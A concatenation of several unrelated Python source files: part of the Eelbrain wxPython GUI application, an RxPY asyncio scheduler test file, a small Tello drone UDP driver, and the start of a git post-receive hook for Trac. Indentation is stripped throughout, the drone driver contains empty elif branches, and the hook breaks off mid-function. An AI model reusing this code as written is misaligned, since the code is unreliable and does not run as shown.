import IPython.core.error
if CONFIG['prompt_toolkit'] == 'eelbrain':
import IPython.terminal.pt_inputhooks
import IPython.core.pylabtools
IPython.terminal.pt_inputhooks.register('eelbrain', self.pt_inputhook)
IPython.core.pylabtools.backend2gui.clear() # prevent pylab from initializing event-loop
shell = IPython.get_ipython()
if shell is not None:
self._pt_thread = self._pt_thread_win if IS_WINDOWS else self._pt_thread_linux
try:
shell.enable_gui(CONFIG['prompt_toolkit'])
except IPython.core.error.UsageError:
print(f"Prompt-toolkit does not seem to be supported by the current IPython shell ({shell.__class__.__name__}); The Eelbrain GUI needs to block Terminal input to work. Use eelbrain.gui.run() to start GUI interaction.")
else:
self.using_prompt_toolkit = True
self._ipython = shell
getLogger('Eelbrain').debug("Initialized prompt_toolkit with %s", CONFIG['prompt_toolkit'])
self.SetExitOnFrameDelete(not self.using_prompt_toolkit)
if IS_OSX:
self.dock_icon = DockIcon(self)
self.menubar = self.CreateMenu(self)
# list windows in Window menu
self.window_menu_window_items = []
self.Bind(wx.EVT_MENU_OPEN, self.OnMenuOpened)
else:
self.dock_icon = None
self.menu_bar = None
self.window_menu_window_items = None
return True
def CreateMenu(self, t):
"""Create Menubar
Parameters
----------
t : App | EelbrainFrame
Object to which the menu will be attached; on macOS ``self``, on
other systems the specific :class:`EelbrainFrame`.
"""
menu_bar = wx.MenuBar()
# File Menu
m = file_menu = wx.Menu()
m.Append(wx.ID_OPEN, '&Open... \tCtrl+O')
m.AppendSeparator()
m.Append(wx.ID_CLOSE, '&Close Window \tCtrl+W')
m.Append(wx.ID_SAVE, "Save \tCtrl+S")
m.Append(wx.ID_SAVEAS, "Save As... \tCtrl+Shift+S")
menu_bar.Append(file_menu, "File")
# Edit Menu
m = edit_menu = wx.Menu()
m.Append(ID.UNDO, '&Undo \tCtrl+Z')
m.Append(ID.REDO, '&Redo \tCtrl+Shift+Z')
m.AppendSeparator()
m.Append(wx.ID_CUT, 'Cut \tCtrl+X')
m.Append(wx.ID_COPY, 'Copy \tCtrl+C')
m.Append(ID.COPY_AS_PNG, 'Copy as PNG \tCtrl+Shift+C')
m.Append(wx.ID_PASTE, 'Paste \tCtrl+V')
m.AppendSeparator()
m.Append(wx.ID_CLEAR, 'Cle&ar')
menu_bar.Append(edit_menu, "Edit")
# Tools Menu
# updated by the active GUI
if IS_OSX or hasattr(t, 'MakeToolsMenu'):
tools_menu = wx.Menu()
if not IS_OSX:
t.MakeToolsMenu(tools_menu)
menu_bar.Append(tools_menu, "Tools")
# View Menu
m = view_menu = wx.Menu()
m.Append(ID.SET_VLIM, "Set Axis Limits... \tCtrl+l", "Change the current figure's axis limits")
m.Append(ID.LINK_TIME_AXES, "Link Time Axes", "Synchronize the time displayed on figures")
m.Append(ID.SET_MARKED_CHANNELS, "Mark Channels...", "Mark specific channels in plots")
m.Append(ID.DRAW_CROSSHAIRS, "Draw &Crosshairs", "Draw crosshairs under the cursor", kind=wx.ITEM_CHECK)
m.AppendSeparator()
m.Append(ID.SET_LAYOUT, "&Set Layout... \tCtrl+Shift+l", "Change the page layout")
menu_bar.Append(view_menu, "View")
# Go Menu
m = go_menu = wx.Menu()
m.Append(wx.ID_FORWARD, '&Forward \tCtrl+]', 'Go One Page Forward')
m.Append(wx.ID_BACKWARD, '&Back \tCtrl+[', 'Go One Page Back')
m.Append(ID.TIME, '&Time... \tCtrl+t', 'Go to time...')
if not self.using_prompt_toolkit:
m.AppendSeparator()
m.Append(ID.YIELD_TO_TERMINAL, '&Yield to Terminal \tAlt+Ctrl+Q')
menu_bar.Append(go_menu, "Go")
# Window Menu
m = window_menu = wx.Menu()
m.Append(ID.WINDOW_MINIMIZE, '&Minimize \tCtrl+M')
m.Append(ID.WINDOW_ZOOM, '&Zoom')
m.Append(ID.SET_TITLE, '&Set Title')
m.AppendSeparator()
m.Append(ID.WINDOW_TILE, '&Tile')
m.AppendSeparator()
menu_bar.Append(window_menu, "Window")
# Help Menu
m = help_menu = wx.Menu()
m.Append(ID.HELP_EELBRAIN, 'Eelbrain Help')
m.Append(ID.HELP_PYTHON, "Python Help")
m.AppendSeparator()
m.Append(wx.ID_ABOUT, '&About Eelbrain')
menu_bar.Append(help_menu, self.GetMacHelpMenuTitleName() if IS_OSX else 'Help')
# Menu Bar
wx.MenuBar.MacSetCommonMenuBar(menu_bar)
# Bind Menu Commands
t.Bind(wx.EVT_MENU, self.OnAbout, id=wx.ID_ABOUT)
t.Bind(wx.EVT_MENU, t.OnOpen, id=wx.ID_OPEN)
t.Bind(wx.EVT_MENU, t.OnClear, id=wx.ID_CLEAR)
t.Bind(wx.EVT_MENU, t.OnWindowClose, id=wx.ID_CLOSE)
t.Bind(wx.EVT_MENU, t.OnCopy, id=wx.ID_COPY)
t.Bind(wx.EVT_MENU, self.OnCopyAsPNG, id=ID.COPY_AS_PNG)
t.Bind(wx.EVT_MENU, self.OnCut, id=wx.ID_CUT)
t.Bind(wx.EVT_MENU, t.OnDrawCrosshairs, id=ID.DRAW_CROSSHAIRS)
t.Bind(wx.EVT_MENU, self.OnOnlineHelp, id=ID.HELP_EELBRAIN)
t.Bind(wx.EVT_MENU, self.OnOnlineHelp, id=ID.HELP_PYTHON)
t.Bind(wx.EVT_MENU, self.OnPaste, id=wx.ID_PASTE)
t.Bind(wx.EVT_MENU, t.OnRedo, id=ID.REDO)
t.Bind(wx.EVT_MENU, t.OnSave, id=wx.ID_SAVE)
t.Bind(wx.EVT_MENU, t.OnSaveAs, id=wx.ID_SAVEAS)
t.Bind(wx.EVT_MENU, t.OnSetLayout, id=ID.SET_LAYOUT)
t.Bind(wx.EVT_MENU, t.OnSetMarkedChannels, id=ID.SET_MARKED_CHANNELS)
t.Bind(wx.EVT_MENU, t.OnSetVLim, id=ID.SET_VLIM)
t.Bind(wx.EVT_MENU, t.OnSetTime, id=ID.TIME)
t.Bind(wx.EVT_MENU, self.OnLinkTimeAxes, id=ID.LINK_TIME_AXES)
t.Bind(wx.EVT_MENU, t.OnUndo, id=ID.UNDO)
t.Bind(wx.EVT_MENU, t.OnWindowIconize, id=ID.WINDOW_MINIMIZE)
t.Bind(wx.EVT_MENU, self.OnWindowTile, id=ID.WINDOW_TILE)
t.Bind(wx.EVT_MENU, t.OnWindowZoom, id=ID.WINDOW_ZOOM)
t.Bind(wx.EVT_MENU, t.OnSetWindowTitle, id=ID.SET_TITLE)
t.Bind(wx.EVT_MENU, self.OnQuit, id=wx.ID_EXIT)
t.Bind(wx.EVT_MENU, self.OnYieldToTerminal, id=ID.YIELD_TO_TERMINAL)
# UI-update concerning frames
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIBackward, id=wx.ID_BACKWARD)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIClear, id=wx.ID_CLEAR)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIClose, id=wx.ID_CLOSE)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIDown, id=wx.ID_DOWN)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIDrawCrosshairs, id=ID.DRAW_CROSSHAIRS)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIForward, id=wx.ID_FORWARD)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIOpen, id=wx.ID_OPEN)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIRedo, id=ID.REDO)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISave, id=wx.ID_SAVE)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISaveAs, id=wx.ID_SAVEAS)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetLayout, id=ID.SET_LAYOUT)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetMarkedChannels, id=ID.SET_MARKED_CHANNELS)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetVLim, id=ID.SET_VLIM)
t.Bind(wx.EVT_UPDATE_UI, self.OnUpdateUILinkTimeAxes, id=ID.LINK_TIME_AXES)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUISetTime, id=ID.TIME)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUITools, id=ID.TOOLS)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIUndo, id=ID.UNDO)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIUp, id=wx.ID_UP)
# UI-update concerning focus
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_COPY)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=ID.COPY_AS_PNG)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_CUT)
t.Bind(wx.EVT_UPDATE_UI, t.OnUpdateUIFocus, id=wx.ID_PASTE)
return menu_bar
def _pt_thread_win(self, context):
# On Windows, select.poll() is not available
while context._input_is_ready is None or not context.input_is_ready():
sleep(0.020)
wx.CallAfter(self.ExitMainLoop, True)
def _pt_thread_linux(self, context):
# getLogger('Eelbrain').debug("PTK: poll")
poll = select.poll()
poll.register(context.fileno(), select.POLLIN)
poll.poll(-1)
wx.CallAfter(self.ExitMainLoop, True)
def pt_inputhook(self, context):
"""prompt_toolkit inputhook"""
# prompt_toolkit.eventloop.inputhook.InputHookContext
Thread(target=self._pt_thread, args=(context,)).start()
self.MainLoop()
def jumpstart(self):
wx.CallLater(JUMPSTART_TIME, self.ExitMainLoop)
self.MainLoop()
def _get_active_frame(self):
win = wx.Window.FindFocus()
win_parent = wx.GetTopLevelParent(win)
if win_parent:
return win_parent
for w in wx.GetTopLevelWindows():
if hasattr(w, 'IsActive') and w.IsActive():
return w
return wx.GetActiveWindow()
def _get_parent_gui(self):
frame = self._get_active_frame()
if frame is None:
return
while True:
if hasattr(frame, 'MakeToolsMenu'):
return frame
elif frame.Parent is not None:
frame = frame.Parent
else:
return
def _bash_ui(self, func, *args):
"Launch a modal dialog based on terminal input"
# Create fake frame to prevent dialog from sticking
if not self.GetTopWindow():
self.SetTopWindow(wx.Frame(None))
# Run dialog
self._bash_ui_from_mainloop = self.using_prompt_toolkit or self.IsMainLoopRunning()
if self._bash_ui_from_mainloop:
return func(*args)
else:
wx.CallAfter(func, *args)
print("Please switch to the Python Application to provide input.")
self.MainLoop()
return self._result
def _bash_ui_finalize(self, result):
if self._bash_ui_from_mainloop:
self.Yield()
return result
else:
self._result = result
self.ExitMainLoop()
def ask_for_dir(self, title="Select Folder", message="Please Pick a Folder",
must_exist=True):
return self._bash_ui(self._ask_for_dir, title, message, must_exist)
def _ask_for_dir(self, title, message, must_exist):
style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT
if must_exist:
style = style | wx.DD_DIR_MUST_EXIST
dialog = wx.DirDialog(None, message, name=title,
style=style)
dialog.SetTitle(title)
if dialog.ShowModal() == wx.ID_OK:
result = dialog.GetPath()
else:
result = False
dialog.Destroy()
return self._bash_ui_finalize(result)
def ask_for_file(self, title, message, filetypes, directory, mult):
return self._bash_ui(self._ask_for_file, title, message, filetypes, directory, mult)
def _ask_for_file(self, title, message, filetypes, directory, mult):
"""Return path(s) or False.
Parameters
----------
...
directory : str
Path to initial directory.
Returns
-------
result : list | str | None
Paths(s) or False.
"""
style = wx.FD_OPEN
if mult:
style = style | wx.FD_MULTIPLE
dialog = wx.FileDialog(None, message, directory, wildcard=wildcard(filetypes), style=style)
dialog.SetTitle(title)
if dialog.ShowModal() == wx.ID_OK:
if mult:
result = dialog.GetPaths()
else:
result = dialog.GetPath()
else:
result = False
dialog.Destroy()
return self._bash_ui_finalize(result)
def ask_for_string(self, title, message, default='', parent=None):
return self._bash_ui(self._ask_for_string, title, message, default, parent)
def _ask_for_string(self, title, message, default, parent):
dialog = wx.TextEntryDialog(parent, message, title, default)
if dialog.ShowModal() == wx.ID_OK:
result = dialog.GetValue()
else:
result = False
dialog.Destroy()
return self._bash_ui_finalize(result)
def ask_saveas(self, title, message, filetypes, defaultDir, defaultFile):
return self._bash_ui(self._ask_saveas, title, message, filetypes, defaultDir, defaultFile)
def _ask_saveas(self, title, message, filetypes, defaultDir, defaultFile):
# setup file-dialog
dialog = wx.FileDialog(None, message, wildcard=wildcard(filetypes), style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
dialog.SetTitle(title)
if defaultDir:
dialog.SetDirectory(defaultDir)
if defaultFile:
dialog.SetFilename(defaultFile)
# get result
if dialog.ShowModal() == wx.ID_OK:
result = dialog.GetPath()
else:
result = False
dialog.Destroy()
return self._bash_ui_finalize(result)
def message_box(self, message, caption, style, parent=None):
return self._bash_ui(self._message_box, message, caption, style, parent)
def _message_box(self, message, caption, style, parent):
dialog = wx.MessageDialog(parent, message, caption, style)
result = dialog.ShowModal()
dialog.Destroy()
return self._bash_ui_finalize(result)
def ExitMainLoop(self, event_with_pt=True):
if event_with_pt or not self.using_prompt_toolkit:
# with prompt-toolkit, this leads to hanging when terminating the
# interpreter
wx.App.ExitMainLoop(self)
def Attach(self, obj, desc, default_name, parent):
if self._ipython is None:
self.message_box("Attach Unavailable", "The attach command requires running from within IPython 5 or later", wx.ICON_ERROR|wx.OK, parent)
return
name = self.ask_for_string("Attach", f"Variable name for {desc} in terminal:", default_name, parent)
if name:
self._ipython.user_global_ns[name] = obj
def OnAbout(self, event):
if not self.about_frame:
self.about_frame = AboutFrame(None)
self.about_frame.Show()
self.about_frame.Raise()
def OnClear(self, event):
frame = self._get_active_frame()
frame.OnClear(event)
def OnCopy(self, event):
win = wx.Window.FindFocus()
if hasattr(win, 'CanCopy'):
return win.Copy()
win = self._get_active_frame()
if hasattr(win, 'CanCopy'):
return win.Copy()
getLogger('Eelbrain').debug("App.OnCopy() call but neither focus nor frame have CanCopy()")
event.Skip()
def OnCopyAsPNG(self, event):
wx.Window.FindFocus().CopyAsPNG()
def OnCut(self, event):
win = wx.Window.FindFocus()
win.Cut()
def OnDrawCrosshairs(self, event):
frame = self._get_active_frame()
frame.OnDrawCrosshairs(event)
def OnLinkTimeAxes(self, event):
from ..plot._base import TimeSlicer
from .._data_obj import UTS
figures = []
for window in wx.GetTopLevelWindows():
eelfigure = getattr(window, '_eelfigure', None)
if eelfigure and isinstance(eelfigure, TimeSlicer) and isinstance(eelfigure._time_dim, UTS):
figures.append(eelfigure)
if len(figures) >= 2:
f0 = figures[0]
for figure in figures[1:]:
f0.link_time_axis(figure)
def OnMenuOpened(self, event):
"Update the window-specific Tools menu"
menu = event.GetMenu()
if menu.GetTitle() == 'Tools':
for item in menu.GetMenuItems():
menu.Remove(item)
frame = self._get_parent_gui()
if frame:
frame.MakeToolsMenu(menu)
def OnOnlineHelp(self, event):
"Called from the Help menu to open external resources"
Id = event.GetId()
if Id == ID.HELP_EELBRAIN:
webbrowser.open("https://pythonhosted.org/eelbrain/")
elif Id == ID.HELP_PYTHON:
webbrowser.open("http://docs.python.org/2.7/")
else:
raise RuntimeError("Invalid help ID")
def OnOpen(self, event):
frame = self._get_active_frame()
frame.OnOpen(event)
def OnPaste(self, event):
win = wx.Window.FindFocus()
win.Paste()
def OnQuit(self, event):
getLogger('Eelbrain').debug("App.OnQuit()")
for win in wx.GetTopLevelWindows():
if not win.Close():
return
getLogger('Eelbrain').debug("App.ExitMainLoop()")
self.ExitMainLoop()
def OnRedo(self, event):
frame = self._get_active_frame()
frame.OnRedo(event)
def OnSave(self, event):
frame = self._get_active_frame()
frame.OnSave(event)
def OnSaveAs(self, event):
frame = self._get_active_frame()
frame.OnSaveAs(event)
def OnSetVLim(self, event):
frame = self._get_active_frame()
frame.OnSetVLim(event)
def OnSetLayout(self, event):
frame = self._get_active_frame()
frame.OnSetLayout(event)
def OnSetMarkedChannels(self, event):
frame = self._get_active_frame()
frame.OnSetMarkedChannels(event)
def OnSetTime(self, event):
frame = self._get_active_frame()
frame.OnSetTime(event)
def OnSetWindowTitle(self, event):
frame = self._get_active_frame()
frame.OnSetWindowTitle(event)
def OnUndo(self, event):
frame = self._get_active_frame()
frame.OnUndo(event)
def OnUpdateUIBackward(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIBackward'):
frame.OnUpdateUIBackward(event)
else:
event.Enable(False)
def OnUpdateUIClear(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIClear'):
frame.OnUpdateUIClear(event)
else:
event.Enable(False)
def OnUpdateUIClose(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIClose'):
frame.OnUpdateUIClose(event)
else:
event.Enable(False)
def OnUpdateUIDown(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIDown'):
frame.OnUpdateUIDown(event)
else:
event.Enable(False)
def OnUpdateUIDrawCrosshairs(self, event):
frame = self._get_active_frame()
if isinstance(frame, EelbrainFrame):
frame.OnUpdateUIDrawCrosshairs(event)
else:
event.Enable(False)
event.Check(False)
def OnUpdateUIForward(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIForward'):
frame.OnUpdateUIForward(event)
else:
event.Enable(False)
def OnUpdateUIFocus(self, event):
func_name = FOCUS_UI_UPDATE_FUNC_NAMES[event.GetId()]
win = wx.Window.FindFocus()
func = getattr(win, func_name, None)
if func is None:
win = self._get_active_frame()
func = getattr(win, func_name, None)
if func is None:
event.Enable(False)
return
event.Enable(func())
def OnUpdateUILinkTimeAxes(self, event):
n = 0
for window in wx.GetTopLevelWindows():
eelfigure = getattr(window, '_eelfigure', None)
if eelfigure:
n += hasattr(eelfigure, 'link_time_axis')
if n >= 2:
event.Enable(True)
return
event.Enable(False)
def OnUpdateUIOpen(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIOpen'):
frame.OnUpdateUIOpen(event)
else:
event.Enable(False)
def OnUpdateUIRedo(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIRedo'):
frame.OnUpdateUIRedo(event)
else:
event.Enable(False)
def OnUpdateUISave(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISave'):
frame.OnUpdateUISave(event)
else:
event.Enable(False)
def OnUpdateUISaveAs(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISaveAs'):
frame.OnUpdateUISaveAs(event)
else:
event.Enable(False)
def OnUpdateUISetLayout(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISetLayout'):
frame.OnUpdateUISetLayout(event)
else:
event.Enable(False)
def OnUpdateUISetMarkedChannels(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISetMarkedChannels'):
frame.OnUpdateUISetMarkedChannels(event)
else:
event.Enable(False)
def OnUpdateUISetVLim(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISetVLim'):
frame.OnUpdateUISetVLim(event)
else:
event.Enable(False)
def OnUpdateUISetTime(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUISetTime'):
frame.OnUpdateUISetTime(event)
else:
event.Enable(False)
def OnUpdateUISetWindowTitle(self, event):
frame = self._get_active_frame()
event.Enable(getattr(frame, '_allow_user_set_title', False))
def OnUpdateUITools(self, event):
event.Enable(bool(self._get_parent_gui))
def OnUpdateUIUndo(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIUndo'):
frame.OnUpdateUIUndo(event)
else:
event.Enable(False)
def OnUpdateUIUp(self, event):
frame = self._get_active_frame()
if frame and hasattr(frame, 'OnUpdateUIUp'):
frame.OnUpdateUIUp(event)
else:
event.Enable(False)
def OnWindowClose(self, event):
frame = self._get_active_frame()
if frame:
frame.Close()
def OnWindowIconize(self, event):
frame = self._get_active_frame()
if frame:
frame.Iconize()
def OnWindowRaise(self, event):
id_ = event.GetId()
window = wx.FindWindowById(id_)
window.Raise()
def OnWindowTile(self, event):
frames = sorted(wx.GetTopLevelWindows(), key=lambda x: x.Position[0])
dx, dy = wx.DisplaySize()
x = 0
y = 0
y_next = 0
for frame in frames:
sx, sy = frame.Size
if x and x + sx > dx:
if y_next > dy:
return
x = 0
y = y_next
frame.Position = (x, y)
y_next = max(y_next, y + sy)
x += sx
def OnWindowZoom(self, event):
frame = self._get_active_frame()
if frame:
frame.Maximize()
def OnYieldToTerminal(self, event):
self.ExitMainLoop()
def get_app(jumpstart=False):
global APP
if APP is None:
try:
APP = App()
except SystemExit as exc:
if exc.code.startswith("This program needs access to the screen"):
raise SystemExit(
f"{exc.code} \n\n"
f"If you are using an iPython terminal: make sure you are "
f"running a framework build by launching IPython with:\n\n"
f" $ eelbrain\n\n"
f"If you are using a Jupyter notebook, prefix the notebook with\n\n"
f" %matplotlib inline\n\n"
f"and restart the kernel.")
else:
raise
if jumpstart and IS_OSX:
# Give wx a chance to initialize the GUI backend
APP.OnAbout(None)
wx.CallLater(JUMPSTART_TIME, APP.about_frame.Close)
wx.CallLater(JUMPSTART_TIME, APP.ExitMainLoop)
APP.MainLoop()
return APP
def needs_jumpstart():
return APP is None and IS_OSX
def run(block=False):
"""Hand over command to the GUI (quit the GUI to return to the terminal)
Parameters
----------
block : bool
Block the Terminal even if the GUI is capable of being run in parallel.
Control returns to the Terminal when the user quits the GUI application.
This is also useful to prevent plots from closing at the end of a
script.
"""
app = get_app()
if app.using_prompt_toolkit:
if block:
app.MainLoop()
else:
if not app.IsMainLoopRunning():
print("Starting GUI. Quit the Python application to return to the "
"shell...")
app.MainLoop()
class DockIcon(TaskBarIcon):
# http://stackoverflow.com/a/38249390/166700
def __init__(self, app):
TaskBarIcon.__init__(self, iconType=TBI_DOCK)
self.app = app
# Set the image
self.SetIcon(Icon('eelbrain256', True), "Eelbrain")
self.imgidx = 1
def CreatePopupMenu(self):
if not self.app.using_prompt_toolkit:
menu = wx.Menu()
menu.Append(ID.YIELD_TO_TERMINAL, '&Yield to Terminal')
return menu
|
test_asynciothreadsafescheduler.py | import unittest
import asyncio
import threading
from datetime import datetime, timedelta
from rx.scheduler.eventloop import AsyncIOThreadSafeScheduler
class TestAsyncIOThreadSafeScheduler(unittest.TestCase):
def test_asyncio_threadsafe_schedule_now(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
diff = scheduler.now - datetime.utcfromtimestamp(loop.time())
assert abs(diff) < timedelta(milliseconds=1)
def test_asyncio_threadsafe_schedule_now_units(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
diff = scheduler.now
yield from asyncio.sleep(0.1)
diff = scheduler.now - diff
assert timedelta(milliseconds=80) < diff < timedelta(milliseconds=180)
def test_asyncio_threadsafe_schedule_action(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
scheduler.schedule(action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1)
assert ran is True
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_due(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
def schedule():
scheduler.schedule_relative(0.2, action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3)
assert endtime is not None
diff = endtime - starttime
assert diff > 0.18
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_cancel(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOThreadSafeScheduler(loop)
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
d = scheduler.schedule_relative(0.05, action)
d.dispose()
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3)
assert ran is False
loop.run_until_complete(go())
def cancel_same_thread_common(self, test_body):
update_state = {
'ran': False,
'dispose_completed': False
}
def action(scheduler, state):
update_state['ran'] = True
# Make the actual test body run in deamon thread, so that in case of
# failure it doesn't hang indefinitely.
def thread_target():
loop = asyncio.new_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
test_body(scheduler, action, update_state)
@asyncio.coroutine
def go():
yield from asyncio.sleep(0.2)
loop.run_until_complete(go())
thread = threading.Thread(target=thread_target)
thread.daemon = True
thread.start()
thread.join(0.3)
assert update_state['dispose_completed'] is True
assert update_state['ran'] is False
def test_asyncio_threadsafe_cancel_non_relative_same_thread(self):
def test_body(scheduler, action, update_state):
d = scheduler.schedule(action)
# Test case when dispose is called on thread on which loop is not
# yet running, and non-relative schedele is used.
d.dispose()
update_state['dispose_completed'] = True
self.cancel_same_thread_common(test_body)
def test_asyncio_threadsafe_schedule_action_cancel_same_thread(self):
def test_body(scheduler, action, update_state):
d = scheduler.schedule_relative(0.05, action)
# Test case when dispose is called on thread on which loop is not
# yet running, and relative schedule is used.
d.dispose()
update_state['dispose_completed'] = True
self.cancel_same_thread_common(test_body)
def test_asyncio_threadsafe_schedule_action_cancel_same_loop(self):
def test_body(scheduler, action, update_state):
d = scheduler.schedule_relative(0.1, action)
def do_dispose():
d.dispose()
update_state['dispose_completed'] = True
# Test case when dispose is called in loop's callback.
scheduler._loop.call_soon(do_dispose)
self.cancel_same_thread_common(test_body)
|
TelloDriver.py | #!/usr/bin/env python2
import socket
import struct
import threading
import time
class TelloDriver:
def __init__(self, tello_ip='192.168.10.1', tello_port=8889):
# Initialize state
self.alive = False # Set to False to terminate listeners
self.state = 0 # enum; 0=connecting, 1=connected
self.udp = None
self.listener_thread = None
# Connect to UDP server
tello_addr = (tello_ip, tello_port)
self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udp.connect(tello_addr)
self.alive = True
self.state = 0
# Setup UDP listener loop
self.listener_thread = threading.Thread(target=self._listener_loop)
self.listener_thread.start()
# Issue connection request
self._send_conn_req()
# Wait for connection ack
while self.state == 0:
time.sleep(0.001)
print('Connected to Tello drone')
def _listener_loop(self):
while self.alive:
data = self.udp.recv(2048)
if not data:
print('! Got empty from recv: %s' % str(data))
self.alive = False
break
if self.state == 0:
if data.find('conn_ack:') == 0:
self.state = 1
continue
self.parse_packet(data)
def parse_packet(self, data):
if len(data) < 7:
return # raise ValueError('Packet too short')
cmd = struct.unpack('<h', data[5:7])[0]
if cmd == 86: # telemetry
elif cmd == 26: # wifi str
elif cmd == 53: # light strength
elif cmd == 26: # wifi str
print('R> %4d, cmd=%d' % (len(data), cmd))
# parse state: ! cmd == 86: parse state, starting from 9th byte
# R > 35, cmd = 86
# R > 13, cmd = 26
# R > 12, cmd = 53
# R > 270, cmd = 4176
def _send_conn_req(self):
packet = bytearray('conn_req:\x96\x17')
self.udp.send(packet)
def disconnect(self):
self.alive = False
if self.listener_thread is not None:
self.listener_thread.join()
self.listener_thread = None
if self.udp is not None:
self.udp.close()
self.udp = None
def takeoff(self):
if not self.alive:
return
packet = bytearray('\xcc\x58\x00\x7c\x68\x54\x00\xe4\x01\xc2\x16')
self.udp.send(packet)
def throw_takeoff(self):
if not self.alive:
return
packet = bytearray('\xcc\x58\x00\x7c\x48\x5d\x00\xe4\x01\xc2\x16')
self.udp.send(packet)
def land(self):
if not self.alive:
return
packet = bytearray('\xcc\x60\x00\x27\x68\x55\x00\xe5\x01\x00\xba\xc7')
packet[9] = 0x00 # what is this flag?
self.udp.send(packet)
if __name__ == '__main__':
tello = None
try:
tello = TelloDriver()
'''
print('Take off')
tello.takeoff()
time.sleep(2.0)
print('Land')
tello.land()
time.sleep(1.0)
'''
input('Press key to terminate')
# tello.disconnect()
finally:
tello.disconnect()
|
git_post_receive.py | #!/usr/bin/env python
#
# This script is run after receive-pack has accepted a pack and the
# repository has been updated. It is passed arguments in through stdin
# in the form
# <oldrev> <newrev> <refname>
# For example:
# aa453216d1b3e49e7f6f98441fa56946ddcd6a20 68f7abf4e6f922807889f52bc043ecd31b79f814 refs/heads/master
# GOAL: Prevent patches that have appeared in one branch from
# reposting to trac when they are moved to another branch
# (this was causing duplicate comments / time from topic branches
# being merged into main
# This specific script will query the repository trying to isolate what
# in this receive is a new commit that the repository has not yet
# seen. It does this by a big call to git rev-parse, including revs
# that are now reachable, excluding everything else (tags, heads,
# oldrevs).
# http://www.kernel.org/pub/software/scm/git/docs/git-rev-list.html
# Once it has isolated what is new it posts those to trac.
import os, os.path, sys,logging, getpass, optparse, re
import subprocess, threading, time, errno
from optparse import OptionParser
from subprocess import PIPE
TRAC_POST_COMMIT = "/home/ACCELERATION/russ/trac-dev/TandE/trac0.12/scripts/trac-post-commit.py"
logdir=os.getenv("LOGDIR") or "/var/log/commit-hooks"
log = logging.getLogger('gpr')
## Fn to easy working with remote processes
def capturedCall(cmd, **kwargs) :
"""Do the equivelent of the subprocess.call except
log the stderr and stdout where appropriate."""
p= capturedPopen(cmd,**kwargs)
rc = p.wait()
#this is a cheap attempt to make sure the monitors
#are scheduled and hopefully finished.
time.sleep(0.01)
time.sleep(0.01)
return rc
#be warned, if you see your pipelines hanging:
#http://old.nabble.com/subprocess.Popen-pipeline-bug--td16026600.html
#close_fds=True
## Fn to easy working with remote processes
def capturedPopen(cmd, stdin=None, stdout=None, stderr=None,
logger=log,cd=None,
stdout_level=logging.INFO,
stderr_level=logging.WARNING, **kwargs) :
"""Equivalent to subprocess.Popen except log stdout and stderr
where appropriate. Also log the command being called."""
#we use None as sigil values for stdin,stdout,stderr above so we
# can distinguish from the caller passing in Pipe.
if(logger):
#if we are logging, record the command we're running,
#trying to strip out passwords.
logger.debug("Running cmd: %s",
isinstance(cmd,str) and cmd
or subprocess.list2cmdline([i for i in cmd
if not i.startswith('-p')]))
if cd :
#subprocess does this already with the cwd arg,
